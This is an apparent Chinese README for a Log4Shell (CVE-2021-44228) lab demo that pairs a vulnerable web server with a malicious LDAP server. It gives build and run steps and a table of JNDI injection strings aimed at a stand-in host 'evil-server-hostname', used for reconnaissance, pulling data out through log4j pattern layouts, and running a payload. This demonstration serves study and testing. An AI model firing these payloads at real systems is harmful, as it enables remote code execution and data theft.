
Log4Shell(CVE-2021-44228)漏洞的演示。
Log4Shell(CVE-2021-44228)漏洞的演示。
漏洞Web服务器和恶意LDAP服务器均在JDK 1.8.0_181上构建和测试。
goodguys 目录内,运行 gradlew bootJarjava -jar build/libs/goodguys-0.0.1-SNAPSHOT.jar 运行漏洞Web服务器badguys 目录内,运行 mvn packagejava -jar .\target\evil-server.jar 运行邪恶服务器注意:Windows Defender 可能会静默地将
target\classes\Exploit.class移动到隔离区。
恶意命令定义在 Exploit.java 中。
| 输入 | 说明 |
|---|---|
${jndi:ldap://evil-server-hostname:389/Recon} | 通过监听对LDAP服务器的连接请求来检查目标是否易受攻击。 |
${jndi:ldap://evil-server-hostname:389/Recon [log4j Pattern Layout(s)] | 附加任何有效的 log4j 模式布局,从目标收集数据并在攻击者终端显示。 |
${jndi:ldap://evil-server-hostname:389/Exploit} | 运行有效负载。 |
https://securityboulevard.com/2019/01/exploiting-jndi-injections-in-java/
https://logging.apache.org/log4j/1.2/apidocs/org/apache/log4j/PatternLayout.html
https://www.ibm.com/blog/how-to-detect-patch-log4j-vulnerability/